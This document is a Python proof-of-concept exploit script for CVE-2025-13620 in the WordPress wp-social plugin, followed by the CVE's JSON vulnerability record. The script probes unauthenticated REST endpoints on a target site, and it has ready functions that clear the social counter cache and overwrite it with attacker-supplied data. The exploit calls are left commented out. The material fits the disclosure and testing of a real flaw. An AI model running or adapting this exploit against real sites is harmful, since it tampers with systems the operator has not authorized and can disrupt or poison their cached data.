CVE-2025-13620

import requests # CVE-2025-13620 PoC - Unauthenticated Cache Manipulation # Target: WordPress site with wp-social plugin <= 3.1.3 TARGET_URL = "https://target-site.com" # Endpoint 1: Clear counter cache (most critical) clear_cache_url = f"{TARGET_URL}/wp-json/wslu/v1/settings/clear_counter_cache" # Endpoint 2: Save arbitrary cache data save_cache_url = f"{TARGET_URL}/wp-json/wslu/v1/save_cache/test" # Endpoint 3: Check cache status check_cache_url = f"{TARGET_URL}/wp-json/wslu/v1/check_cache/test" def exploit_clear_cache(): """ Exploit to clear social counter cache without authentication. This can cause denial of service by removing cached social share counts. """ headers = { "Content-Type": "application/json", "X-HTTP-Method-Override": "DELETE" } response = requests.post(clear_cache_url, headers=headers, timeout=10) print(f"Clear cache response: {response.status_code}") return response def exploit_save_fake_cache(): """ Exploit to overwrite cache with attacker-controlled data. Could be used for cache poisoning attacks. """ payload = { "cache_data": "malicious_cache_content" } response = requests.post(save_cache_url, json=payload, timeout=10) print(f"Save cache response: {response.status_code}") return response def check_vulnerability(): """ Verify if the target is vulnerable by checking cache endpoint access. """ response = requests.get(check_cache_url, timeout=10) if response.status_code == 200: print(f"[+] Target is VULNERABLE - No auth required for REST endpoints") print(f"Response: {response.text}") return True else: print(f"[-] Target may not be vulnerable or plugin not installed") return False if __name__ == "__main__": print("CVE-2025-13620 Exploitation Script") print("=" * 50) check_vulnerability() # Uncomment to execute exploitation: # exploit_clear_cache() # exploit_save_fake_cache()

{"cve": {"id": "CVE-2025-13620", "sourceIdentifier": "[email protected]", "published": "2025-12-05T11:15:51.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to missing authorization in versions up to, and including, 3.1.3. This is due to the REST routes wslu/v1/check_cache/{type}, wslu/v1/save_cache/{type}, and wslu/v1/settings/clear_counter_cache being registered with permission_callback set to __return_true and lacking capability or nonce validation in their handlers. This makes it possible for unauthenticated attackers to clear or overwrite the social counter cache via crafted REST requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3402340/wp-social/tags/3.1.4/inc/admin-rest-api.php", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-13620/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fa205d7-61ce-4ab9-b532-fd0b46b0f6a0?source=cve", "source": "[email protected]"}]}}